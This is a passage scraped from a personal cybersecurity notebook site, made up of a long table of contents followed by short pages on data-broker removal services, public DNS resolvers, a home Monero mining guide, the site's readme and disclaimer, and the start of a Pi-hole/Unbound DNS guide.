# Table of Contents - [Personal Information Removal Services | Martian Defense NoteBook](#personal-information-removal-services-martian-defense-notebook) - [Public DNS Services | Martian Defense NoteBook](#public-dns-services-martian-defense-notebook) - [Security Research | Martian Defense NoteBook](#security-research-martian-defense-notebook) - [Programming | Martian Defense NoteBook](#programming-martian-defense-notebook) - [Platforms | Martian Defense NoteBook](#platforms-martian-defense-notebook) - [Threat Intelligence | Martian Defense NoteBook](#threat-intelligence-martian-defense-notebook) - [Monero Mining Guide | Martian Defense NoteBook](#monero-mining-guide-martian-defense-notebook) - [Martian Defense Notebook | Martian Defense NoteBook](#martian-defense-notebook-martian-defense-notebook) - [Git | Martian Defense NoteBook](#git-martian-defense-notebook) - [Private and Secure DNS with Pi-hole and Unbound | Martian Defense NoteBook](#private-and-secure-dns-with-pi-hole-and-unbound-martian-defense-notebook) - [De-Googling Android | Martian Defense NoteBook](#de-googling-android-martian-defense-notebook) - [Certifications | Martian Defense NoteBook](#certifications-martian-defense-notebook) - [Web Security Testing | Martian Defense NoteBook](#web-security-testing-martian-defense-notebook) - [Live Vulnerable Sites | Martian Defense NoteBook](#live-vulnerable-sites-martian-defense-notebook) - [General | Martian Defense NoteBook](#general-martian-defense-notebook) - [Defensive Security | Martian Defense NoteBook](#defensive-security-martian-defense-notebook) - [DNS Leak Prevention and Firewall Configuration | Martian Defense NoteBook](#dns-leak-prevention-and-firewall-configuration-martian-defense-notebook) - [Media | Martian Defense NoteBook](#media-martian-defense-notebook) - [Bug Bounty Programs | Martian Defense NoteBook](#bug-bounty-programs-martian-defense-notebook) - [PHP Security | Martian Defense NoteBook](#php-security-martian-defense-notebook) - [Publishing CVEs | Martian Defense NoteBook](#publishing-cves-martian-defense-notebook) - [JWTs and JSON | Martian Defense NoteBook](#jwts-and-json-martian-defense-notebook) - [Product Security Engineering | Martian Defense NoteBook](#product-security-engineering-martian-defense-notebook) - [Programming | Martian Defense NoteBook](#programming-martian-defense-notebook) - [Product Security Governance | Martian Defense NoteBook](#product-security-governance-martian-defense-notebook) - [Controversial Subjects | Martian Defense NoteBook](#controversial-subjects-martian-defense-notebook) - [CTF Sites | Martian Defense NoteBook](#ctf-sites-martian-defense-notebook) - [Entrepreneurship Roadmaps | Martian Defense NoteBook](#entrepreneurship-roadmaps-martian-defense-notebook) - [Android OSes | Martian Defense NoteBook](#android-oses-martian-defense-notebook) - [Red Teaming | Martian Defense NoteBook](#red-teaming-martian-defense-notebook) - [AppSec Testing | Martian Defense NoteBook](#appsec-testing-martian-defense-notebook) - [Red Team OPSEC Playbook | Martian Defense NoteBook](#red-team-opsec-playbook-martian-defense-notebook) - [Targeted Test Cases | Martian Defense NoteBook](#targeted-test-cases-martian-defense-notebook) - [Python | Martian Defense NoteBook](#python-martian-defense-notebook) - [Product Security Hardening | Martian Defense NoteBook](#product-security-hardening-martian-defense-notebook) - [Privacy and Opsec Resources | Martian Defense NoteBook](#privacy-and-opsec-resources-martian-defense-notebook) - [Governance, Risk, Compliance | Martian Defense NoteBook](#governance-risk-compliance-martian-defense-notebook) - [CSSLP | Martian Defense NoteBook](#csslp-martian-defense-notebook) - [Common System Task Info | Martian Defense NoteBook](#common-system-task-info-martian-defense-notebook) - [Command Injection Testing | Martian Defense NoteBook](#command-injection-testing-martian-defense-notebook) - [CVE Hunting Python Repos with VulnHunter | Martian Defense NoteBook](#cve-hunting-python-repos-with-vulnhunter-martian-defense-notebook) - [Cybersecurity Operating Systems | Martian Defense NoteBook](#cybersecurity-operating-systems-martian-defense-notebook) - [Offensive | Martian Defense NoteBook](#offensive-martian-defense-notebook) - [Mobile Pentesting | Martian Defense NoteBook](#mobile-pentesting-martian-defense-notebook) - [DNS | Martian Defense NoteBook](#dns-martian-defense-notebook) - [Cybersecurity Roadmaps | Martian Defense NoteBook](#cybersecurity-roadmaps-martian-defense-notebook) - [Internal Active Recon | Martian Defense NoteBook](#internal-active-recon-martian-defense-notebook) - [Keeping it Real for Beginners | Martian Defense NoteBook](#keeping-it-real-for-beginners-martian-defense-notebook) - [Reading and Repos | Martian Defense NoteBook](#reading-and-repos-martian-defense-notebook) - [Capture-the-Flag Training | Martian Defense NoteBook](#capture-the-flag-training-martian-defense-notebook) - [Expose the Web UI over Tailnet | Martian Defense NoteBook](#expose-the-web-ui-over-tailnet-martian-defense-notebook) - [Splunk | Martian Defense NoteBook](#splunk-martian-defense-notebook) - [Open Source Business & SaaS Tools | Martian Defense NoteBook](#open-source-business-saas-tools-martian-defense-notebook) - [SAST/SCA | Martian Defense NoteBook](#sast-sca-martian-defense-notebook) - [Mobile Checklist | Martian Defense NoteBook](#mobile-checklist-martian-defense-notebook) - [Dashboards | Martian Defense NoteBook](#dashboards-martian-defense-notebook) - [Consulting | Martian Defense NoteBook](#consulting-martian-defense-notebook) - [Cheatsheets | Martian Defense NoteBook](#cheatsheets-martian-defense-notebook) - [Accessing Tor | Martian Defense NoteBook](#accessing-tor-martian-defense-notebook) - [Resume and Interview Guide | Martian Defense NoteBook](#resume-and-interview-guide-martian-defense-notebook) - [Recon + OSINT | Martian Defense NoteBook](#recon-osint-martian-defense-notebook) - [Checklists | Martian Defense NoteBook](#checklists-martian-defense-notebook) - [LLM Pentesting | Martian Defense NoteBook](#llm-pentesting-martian-defense-notebook) - [Vulnerable Machine Checklist | Martian Defense NoteBook](#vulnerable-machine-checklist-martian-defense-notebook) - [Shodan Dork Cheatsheet | Martian Defense NoteBook](#shodan-dork-cheatsheet-martian-defense-notebook) - [Vulnerability Management Lifecycle | Martian Defense NoteBook](#vulnerability-management-lifecycle-martian-defense-notebook) - [Wordlists | Martian Defense NoteBook](#wordlists-martian-defense-notebook) - [JavaScript | Martian Defense NoteBook](#javascript-martian-defense-notebook) - [Cryptography Checklist | Martian Defense NoteBook](#cryptography-checklist-martian-defense-notebook) - [Forensics Checklist | Martian Defense NoteBook](#forensics-checklist-martian-defense-notebook) - [Two-VPS Private Proxy Architecture: Nginx Reverse Proxy Over Wireguard VPN | Martian Defense NoteBook](#two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn-martian-defense-notebook) - [Martian's Stack | Martian Defense NoteBook](#martian-s-stack-martian-defense-notebook) - [Acquiring Monero (XMR) Anonymously | Martian Defense NoteBook](#acquiring-monero-xmr-anonymously-martian-defense-notebook) - [Secure Remote Access with TailScale + Hardened SSH | Martian Defense NoteBook](#secure-remote-access-with-tailscale-hardened-ssh-martian-defense-notebook) - [AppSec Training Pathway | Martian Defense NoteBook](#appsec-training-pathway-martian-defense-notebook) - [Reporting | Martian Defense NoteBook](#reporting-martian-defense-notebook) - [App Pentest Toolkit | Martian Defense NoteBook](#app-pentest-toolkit-martian-defense-notebook) - [Network Security | Martian Defense NoteBook](#network-security-martian-defense-notebook) - [Remotely Unlocking LUKS-Encrypted Proxmox with Dropbear SSH at Boot | Martian Defense NoteBook](#remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot-martian-defense-notebook) - [Container Security | Martian Defense NoteBook](#container-security-martian-defense-notebook) - [Post-Exploitation | Martian Defense NoteBook](#post-exploitation-martian-defense-notebook) - [Reverse Engineering Checklist | Martian Defense NoteBook](#reverse-engineering-checklist-martian-defense-notebook) - [DevSecOps | Martian Defense NoteBook](#devsecops-martian-defense-notebook) - [Remote Unlock of LUKS-Encrypted Root Disk via SSH | Martian Defense NoteBook](#remote-unlock-of-luks-encrypted-root-disk-via-ssh-martian-defense-notebook) - [Offensive Security | Martian Defense NoteBook](#offensive-security-martian-defense-notebook) - [Ports and associated Vectors | Martian Defense NoteBook](#ports-and-associated-vectors-martian-defense-notebook) - [Information Gathering | Martian Defense NoteBook](#information-gathering-martian-defense-notebook) - [Portable pyenv Setup for Python Vulnerability Research | Martian Defense NoteBook](#portable-pyenv-setup-for-python-vulnerability-research-martian-defense-notebook) - [AI | Martian Defense NoteBook](#ai-martian-defense-notebook) - [Reverse Engineering | Martian Defense NoteBook](#reverse-engineering-martian-defense-notebook) - [Privacy-Focused DNS Configuration Guides | Martian Defense NoteBook](#privacy-focused-dns-configuration-guides-martian-defense-notebook) - [IT Tasks | Martian Defense NoteBook](#it-tasks-martian-defense-notebook) - [Red Team Infrastructure | Martian Defense NoteBook](#red-team-infrastructure-martian-defense-notebook) - [General Cybersecurity | Martian Defense NoteBook](#general-cybersecurity-martian-defense-notebook) - [Golang | Martian Defense NoteBook](#golang-martian-defense-notebook) - [Golang Snippets | Martian Defense NoteBook](#golang-snippets-martian-defense-notebook) - [How to setup a GitHub Action for Code Security analysis | Martian Defense NoteBook](#how-to-setup-a-github-action-for-code-security-analysis-martian-defense-notebook) - [Python Snippets | Martian Defense NoteBook](#python-snippets-martian-defense-notebook) - [Quick Notes | Martian Defense NoteBook](#quick-notes-martian-defense-notebook) - [PowerShell | Martian Defense NoteBook](#powershell-martian-defense-notebook) - [Defensive | Martian Defense NoteBook](#defensive-martian-defense-notebook) - [Entry Points | Martian Defense NoteBook](#entry-points-martian-defense-notebook) - [Bleeding Edge Vulnerabilities | Martian Defense NoteBook](#bleeding-edge-vulnerabilities-martian-defense-notebook) - [Domain 7: Secure Software Deployment, Operations, Maintenance | Martian Defense NoteBook](#domain-7-secure-software-deployment-operations-maintenance-martian-defense-notebook) - [Enable and test Wake-on-LAN (WOL) | Martian Defense NoteBook](#enable-and-test-wake-on-lan-wol-martian-defense-notebook) - [Domain 5: Secure Software Implementation | Martian Defense NoteBook](#domain-5-secure-software-implementation-martian-defense-notebook) - [Tools | Martian Defense NoteBook](#tools-martian-defense-notebook) - [Volatility | Martian Defense NoteBook](#volatility-martian-defense-notebook) - [Blockchain | Martian Defense NoteBook](#blockchain-martian-defense-notebook) - [General | Martian Defense NoteBook](#general-martian-defense-notebook) - [Proxmox VE | Martian Defense NoteBook](#proxmox-ve-martian-defense-notebook) - [Binary Exploitation | Martian Defense NoteBook](#binary-exploitation-martian-defense-notebook) - [Idle Proxmox Auto-Shutdown | Martian Defense NoteBook](#idle-proxmox-auto-shutdown-martian-defense-notebook) - [Part 2 | Martian Defense NoteBook](#part-2-martian-defense-notebook) - [Threat Modeling | Martian Defense NoteBook](#threat-modeling-martian-defense-notebook) - [Linux Basics | Martian Defense NoteBook](#linux-basics-martian-defense-notebook) - [Web Tools | Martian Defense NoteBook](#web-tools-martian-defense-notebook) - [Password Attacks | Martian Defense NoteBook](#password-attacks-martian-defense-notebook) - [Security | Martian Defense NoteBook](#security-martian-defense-notebook) - [Proxmox Update Setup Guide | Martian Defense NoteBook](#proxmox-update-setup-guide-martian-defense-notebook) - [SQL Injection Fundamentals | Martian Defense NoteBook](#sql-injection-fundamentals-martian-defense-notebook) - [Cybersecurity Training Topics | Martian Defense NoteBook](#cybersecurity-training-topics-martian-defense-notebook) - [Linux Privilege Escalation | Martian Defense NoteBook](#linux-privilege-escalation-martian-defense-notebook) - [Social Engineering | Martian Defense NoteBook](#social-engineering-martian-defense-notebook) - [Infrastructure Pentesting | Martian Defense NoteBook](#infrastructure-pentesting-martian-defense-notebook) - [Cybersecurity Domains | Martian Defense NoteBook](#cybersecurity-domains-martian-defense-notebook) - [Guides | Martian Defense NoteBook](#guides-martian-defense-notebook) - [Access Control Lists and Entries (ACL & ACE) | Martian Defense NoteBook](#access-control-lists-and-entries-acl-ace-martian-defense-notebook) - [Domain 8: Secure Software Supply Chain | Martian Defense NoteBook](#domain-8-secure-software-supply-chain-martian-defense-notebook) - [Web Fuzzing | Martian Defense NoteBook](#web-fuzzing-martian-defense-notebook) - [Forwarding Mode Explained: Forward Queries to Upstream DNS Server (Optionally with DNS-over-TLS) | Martian Defense NoteBook](#forwarding-mode-explained-forward-queries-to-upstream-dns-server-optionally-with-dns-over-tls-martian-defense-notebook) - [Incident Response | Martian Defense NoteBook](#incident-response-martian-defense-notebook) - [Cloud Security Testing | Martian Defense NoteBook](#cloud-security-testing-martian-defense-notebook) - [Self-Hosting | Martian Defense NoteBook](#self-hosting-martian-defense-notebook) - [WireShark filters | Martian Defense NoteBook](#wireshark-filters-martian-defense-notebook) - [Windows Privesc | Martian Defense NoteBook](#windows-privesc-martian-defense-notebook) - [API Testing Checklist | Martian Defense NoteBook](#api-testing-checklist-martian-defense-notebook) - [IoS Pentesting Checklist | Martian Defense NoteBook](#ios-pentesting-checklist-martian-defense-notebook) - [JavaScript Security Analysis | Martian Defense NoteBook](#javascript-security-analysis-martian-defense-notebook) - [Starting a Business | Martian Defense NoteBook](#starting-a-business-martian-defense-notebook) - [Manual Enumeration | Martian Defense NoteBook](#manual-enumeration-martian-defense-notebook) - [Domain Trust Enumeration | Martian Defense NoteBook](#domain-trust-enumeration-martian-defense-notebook) - [Forensics | Martian Defense NoteBook](#forensics-martian-defense-notebook) - [Hosting Gitea & Forgejo with Docker, Nginx, and Cloudflare Proxy | Martian Defense NoteBook](#hosting-gitea-forgejo-with-docker-nginx-and-cloudflare-proxy-martian-defense-notebook) - [Pivoting, Tunneling and Forwarding | Martian Defense NoteBook](#pivoting-tunneling-and-forwarding-martian-defense-notebook) --- # Personal Information Removal Services | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/personal-information-removal-services.md) . In order to protect yourself from data brokers, you should utilize personal information removal services such as Incogni or DeleteMe which can reach out to them on your behalf and request the deletion of your personal information. [https://get.incogni.io/aff\_c?offer\_id=1434&aff\_id=27960get.incogni.io](https://get.incogni.io/aff_c?offer_id=1434&aff_id=27960) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fjoindeleteme.com%2Fwp-content%2Fuploads%2F2023%2F04%2Fdeleteme-favicon-icon.png&width=20&dpr=3&quality=100&sign=4ed4c86d&sv=2)Your Privacy is our BusinessDeleteMe](https://joindeleteme.com/) [PreviousApp Pentest Toolkit](https://martian1337.gitbook.io/notes/notes/app-pentest-toolkit) [NextPrivacy-Focused DNS Configuration Guides](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides) Last updated 1 year ago --- # Public DNS Services | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/dns-services.md) . Sometimes 3rd party DNS servers perform better then assigned DNS servers. The ISPs sometimes add a delay to resolution to artificially throttle their users when surfing the web. There are several public DNS servers that block Malware or Adult Content as well CloudFlare: [1.1.1.1](http://1.1.1.1/) - Resolve Everything [1.1.1.2](http://1.1.1.2/) / [1.0.0.2](http://1.0.0.2/) - Block Malware [1.1.1.3](http://1.1.1.3/) / [1.0.0.3](http://1.0.0.3/) - Block Malware & Adult AdGuard DNS: IPv4: [176.103.130.130](http://176.103.130.130/) , [176.103.130.131](http://176.103.130.131/) IPv6: 2a00:5a60::ad1:0ff, 2a00:5a60::ad2:0ff AdBlock DNS: IPv4: [176.103.130.132](http://176.103.130.132/) , [176.103.130.134](http://176.103.130.134/) IPv6: 2a00:5a60::bad1:0ff, 2a00:5a60::bad2:0ff CleanBrowsing: Family Filter: [185.228.168.168](http://185.228.168.168/) , [185.228.169.168](http://185.228.169.168/) Adult Filter: [185.228.168.10](http://185.228.168.10/) , [185.228.169.11](http://185.228.169.11/) Security Filter: [185.228.168.9](http://185.228.168.9/) , [185.228.169.9](http://185.228.169.9/) Comodo Secure DNS: IPv4: [8.26.56.26](http://8.26.56.26/) , [8.20.247.20](http://8.20.247.20/) IPv6: 2620:119:35::35, 2620:119:53::53 Yandex.DNS: IPv4: [77.88.8.8](http://77.88.8.8/) , [77.88.8.1](http://77.88.8.1/) IPv6: 2a02:6b8::feed:0ff, 2a02:6b8:0:1::feed:0ff IBM Quad9+: IPv4: [9.9.9.10](http://9.9.9.10/) , [149.112.112.10](http://149.112.112.10/) IPv6: 2620:fe::10, 2620:fe::fe SecureDNS: IPv4: [195.46.39.39](http://195.46.39.39/) , [195.46.39.40](http://195.46.39.40/) IPv6: 2001:67c:28a4::, 2001:67c:28a4::1 Neustar DNS: IPv4: [156.154.70.1](http://156.154.70.1/) , [156.154.71.1](http://156.154.71.1/) IPv6: 2610:a1:1018::1, 2610:a1:1019::1 Mullvad: [https://mullvad.net/en/help/dns-over-https-and-dns-over-tls](https://mullvad.net/en/help/dns-over-https-and-dns-over-tls) [PreviousForwarding Mode Explained: Forward Queries to Upstream DNS Server (Optionally with DNS-over-TLS)](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/forwarding-mode-explained-forward-queries-to-upstream-dns-server-optionally-with-dns-over-tls) [NextPrivacy and Opsec Resources](https://martian1337.gitbook.io/notes/digital-privacy/opsec) Last updated 1 year ago --- # Security Research | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/security-research.md) . [Publishing CVEs](https://martian1337.gitbook.io/notes/notes/security-research/publishing-cves) [Shodan Dork Cheatsheet](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet) [Github Dorks](https://martian1337.gitbook.io/notes/notes/security-research/github-dorks) [Bug Bounty](https://martian1337.gitbook.io/notes/notes/security-research/bug-bounty) [CVE Hunting Python Repos with VulnHunter](https://martian1337.gitbook.io/notes/notes/security-research/cve-hunting-python-repos-with-vulnhunter) [Portable pyenv Setup for Python Vulnerability Research](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research) [PreviousJWTs and JSON](https://martian1337.gitbook.io/notes/notes/appsec/json) [NextPublishing CVEs](https://martian1337.gitbook.io/notes/notes/security-research/publishing-cves) Last updated 1 year ago --- # Programming | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/coding-programming.md) . [Secure Coding Practices Checklist](https://martian1337.gitbook.io/notes/notes/coding-programming/secure-coding-practices-checklist) [JavaScript](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript) [Python](https://martian1337.gitbook.io/notes/notes/coding-programming/python) [Golang](https://martian1337.gitbook.io/notes/notes/coding-programming/golang) [PHP](https://martian1337.gitbook.io/notes/notes/coding-programming/php) [Packaging and Automation of Docker Linux Apps](https://martian1337.gitbook.io/notes/notes/coding-programming/packaging-and-automation-of-docker-linux-apps) [PreviousPortable pyenv Setup for Python Vulnerability Research](https://martian1337.gitbook.io/notes/notes/security-research/portable-pyenv-setup-for-python-vulnerability-research) [NextSecure Coding Practices Checklist](https://martian1337.gitbook.io/notes/notes/coding-programming/secure-coding-practices-checklist) Last updated 1 year ago --- # Platforms | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/training-and-career/platforms.md) . [General](https://martian1337.gitbook.io/notes/training-and-career/platforms/general) [Offensive Security](https://martian1337.gitbook.io/notes/training-and-career/platforms/offensive-security) [Defensive Security](https://martian1337.gitbook.io/notes/training-and-career/platforms/defensive-security) [CTF Sites](https://martian1337.gitbook.io/notes/training-and-career/platforms/ctf-sites) [Live Vulnerable Sites](https://martian1337.gitbook.io/notes/training-and-career/platforms/live-vulnerable-sites) [PreviousExploit & Malware Development](https://martian1337.gitbook.io/notes/training-and-career/guides/exploit-and-malware-development) [NextGeneral](https://martian1337.gitbook.io/notes/training-and-career/platforms/general) Last updated 1 year ago --- # Threat Intelligence | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/security-research/threat-intelligence.md) . Gathering basic threat intelligence for APT groups: 1. Check for the group using the [MITRE resources](https://attack.mitre.org/groups/) 2. Research their TTPs and patterns of exploitation/breaches Last updated 1 year ago --- # Monero Mining Guide | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide.md) . Mining Monero (XMR) is best done using CPUs due to its ASIC-resistant RandomX algorithm. This guide will walk you through getting started with mining Monero at home efficiently and securely. ### [](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide#id-1-choose-your-hardware) 1\. Choose Your Hardware * Use a high-performance CPU such as AMD Ryzen 9 7950X or Intel i9-13900K for the best performance and energy efficiency. * GPUs can also be used but are generally less efficient than CPUs for Monero mining. ### [](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide#id-2-set-up-a-monero-wallet) 2\. Set Up a Monero Wallet * Download an official Monero wallet to receive mining payouts. * Recommended wallets: * **Monero GUI Wallet:** Official full node wallet [https://www.getmonero.org/downloads/](https://www.getmonero.org/downloads/) * **MyMonero:** Lightweight wallet * **Monerujo:** Android mobile wallet * Securely generate and back up your wallet address. ### [](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide#id-3-download-mining-software) 3\. Download Mining Software * Use trusted, open-source mining software optimized for RandomX: * **XMRig:** Most popular and efficient CPU miner, supports Windows, Linux, macOS [https://xmrig.com/](https://xmrig.com/) (Official site and GitHub for verified releases) * **SRBMiner:** CPU miner for RandomX [https://github.com/doktor83/SRBMiner-Multi](https://github.com/doktor83/SRBMiner-Multi) * **Gupax:** GUI miner with P2Pool integration (easy to use) [https://gupax.io/](https://gupax.io/) * **MineCore:** [https://www.minecore.live/](https://www.minecore.live/) * Optionally, the Monero GUI wallet has a built-in solo miner for beginners. ### [](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide#id-4-join-a-mining-pool-recommended) 4\. Join a Mining Pool (Recommended) * Pool mining provides steady payouts: * **MineXMR:** [https://minexmr.com/](https://minexmr.com/) * **SupportXMR:** [https://supportxmr.com/](https://supportxmr.com/) * **P2Pool:** Decentralized pool with increased privacy [https://github.com/SChernykh/p2pool](https://github.com/SChernykh/p2pool) * Create an account or register your wallet address on the pool. ### [](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide#id-5-configure-the-miner) 5\. Configure the Miner * Edit the miner configuration file or use the GUI: * Enter your Monero wallet address. * Set the mining pool URL and port. * Adjust CPU thread usage for optimal performance. * Enable large/huge pages if your OS permits for better efficiency. * Save changes before starting the miner. ### [](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide#id-6-start-mining-and-monitor) 6\. Start Mining and Monitor * Run the mining software. * Monitor your hashrate, CPU temperature, and power consumption. * Track your mining progress and payouts via the mining pool dashboard or wallet. * Adjust settings and optimize cooling as necessary to maximize profitability. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide#useful-resources) Useful Resources 1. [https://minexmr.com/miningguide](https://minexmr.com/miningguide) 2. [https://stealthex.io/blog/monero-mining-the-ultimate-guide-on-how-to-mine-monero-xmr/](https://stealthex.io/blog/monero-mining-the-ultimate-guide-on-how-to-mine-monero-xmr/) 3. [https://www.btcc.com/en-CA/academy/crypto-basics/monero-mining-guide-a-complete-guide-in-2025](https://www.btcc.com/en-CA/academy/crypto-basics/monero-mining-guide-a-complete-guide-in-2025) 4. [https://godex.io/blog/a-comprehensive-guide-on-how-to-mine-monero-cryptocurrency](https://godex.io/blog/a-comprehensive-guide-on-how-to-mine-monero-cryptocurrency) 5. [https://github.com/etica/randomx-documentation](https://github.com/etica/randomx-documentation) 6. [https://99bitcoins.com/guides-and-tutorials/monero-mining/](https://99bitcoins.com/guides-and-tutorials/monero-mining/) 7. [https://www.reddit.com/r/MoneroMining/comments/1l6vuzg/a\_simple\_securityfocused\_guide\_to\_mining\_monero/](https://www.reddit.com/r/MoneroMining/comments/1l6vuzg/a_simple_securityfocused_guide_to_mining_monero/) 8. [https://www.coincashew.com/coins/overview-xmr/guide-or-how-to-run-a-full-node](https://www.coincashew.com/coins/overview-xmr/guide-or-how-to-run-a-full-node) 9. [https://www.getmonero.org/resources/developer-guides/](https://www.getmonero.org/resources/developer-guides/) 10. [https://www.getmonero.org/get-started/mining/](https://www.getmonero.org/get-started/mining/) 11. [https://exolix.com/blog/how-to-mine-monero-xmr-in-2025](https://exolix.com/blog/how-to-mine-monero-xmr-in-2025) 12. [https://www.coinwarz.com/mining/monero/calculator](https://www.coinwarz.com/mining/monero/calculator) 13. [https://atomicwallet.io/academy/articles/monero-mining](https://atomicwallet.io/academy/articles/monero-mining) 14. [https://blog.monerica.com/articles/best-monero-mining-software](https://blog.monerica.com/articles/best-monero-mining-software) [PreviousTwo-VPS Private Proxy Architecture: Nginx Reverse Proxy Over Wireguard VPN](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn) [NextAndroid OSes](https://martian1337.gitbook.io/notes/digital-privacy/android-oses) Last updated 9 months ago * [1\. Choose Your Hardware](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide#id-1-choose-your-hardware) * [2\. Set Up a Monero Wallet](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide#id-2-set-up-a-monero-wallet) * [3\. Download Mining Software](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide#id-3-download-mining-software) * [4\. Join a Mining Pool (Recommended)](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide#id-4-join-a-mining-pool-recommended) * [5\. Configure the Miner](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide#id-5-configure-the-miner) * [6\. Start Mining and Monitor](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide#id-6-start-mining-and-monitor) * [Useful Resources](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide#useful-resources) --- # Martian Defense Notebook | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/readme.md) . ![](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2F2615529102-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F997kcgdjxml4NiriygeG%252Fuploads%252Fgit-blob-01288aecb47374aba36286929e32dee4b8914273%252FSocial-Media-Profile-02.jpg%3Falt%3Dmedia&width=768&dpr=3&quality=100&sign=e6f8050&sv=2) Welcome to the Martian Defense Notebook!! #### [](https://martian1337.gitbook.io/notes#what-is-this) What is this? This is a notebook collection with cybersecurity resources and practical notes I develop during my journey in various roles as a cybersecurity professional. Ensure to review other projects and navigate the main site at [https://martiandefense.org](https://martiandefense.org/) [](https://martian1337.gitbook.io/notes#license) License ------------------------------------------------------------- [![Creative Commons License](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fi.creativecommons.org%2Fl%2Fby-nd%2F4.0%2F88x31.png&width=300&dpr=3&quality=100&sign=6b76629c&sv=2)](http://creativecommons.org/licenses/by-nd/4.0/) Copyright © Martian Defense, LLC 2025. Except where otherwise specified (the external information copied into this book belongs to the original authors), the information within Martian Defense NoteBook by Martian Defense is licensed under a [Creative Commons Attribution-NoDerivatives 4.0 International License](http://creativecommons.org/licenses/by-nd/4.0/) . Contact Martian Defense, LLC before any reuse of this material. [](https://martian1337.gitbook.io/notes#disclaimer) Disclaimer ------------------------------------------------------------------- This content includes field notes from conducting various Cybersecurity hands-on training exercises such as HacktheBox Academy, the OWASP Web Security Testing Guide, TryHackMe and personally crafted field projects from field expertise. 'Martian Defense NoteBook,' is intended for educational and informational purposes only. The content within this book is provided on an 'as is' basis, and the authors and publishers make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability, or availability of the information, products, services, or related graphics contained within this book. Any reliance you place on such information is therefore strictly at your own risk. The authors and publishers shall in no event be liable for any loss or damage, including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the use of this book. Furthermore, the techniques and tips described in this book are provided for educational and informational purposes only, and should not be used for any illegal or malicious activities. The authors and publishers do not condone or support any illegal or unethical activities, and any use of the information contained within this book is at the user's own risk and discretion. The user is solely responsible for any actions taken based on the information contained within this book, and should always seek professional advice and assistance when attempting to implement any of the techniques or tips described herein. [NextKeeping it Real for Beginners](https://martian1337.gitbook.io/notes/training-and-career/keeping-it-real-for-beginners) Last updated 6 months ago * [License](https://martian1337.gitbook.io/notes#license) * [Disclaimer](https://martian1337.gitbook.io/notes#disclaimer) --- # Git | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git.md) . [Hosting Gitea & Forgejo with Docker, Nginx, and Cloudflare Proxy](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy) [PreviousRemote Unlock of LUKS-Encrypted Root Disk via SSH](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/remote-unlock-of-luks-encrypted-root-disk-via-ssh) [NextHosting Gitea & Forgejo with Docker, Nginx, and Cloudflare Proxy](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy) --- # Private and Secure DNS with Pi-hole and Unbound | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound.md) . This section provides detailed configuration guides to help implement a privacy-focused, secure DNS environment using Pi-hole and Unbound. It covers multiple installation approaches and essential security enhancements to protect DNS traffic from unwanted surveillance or 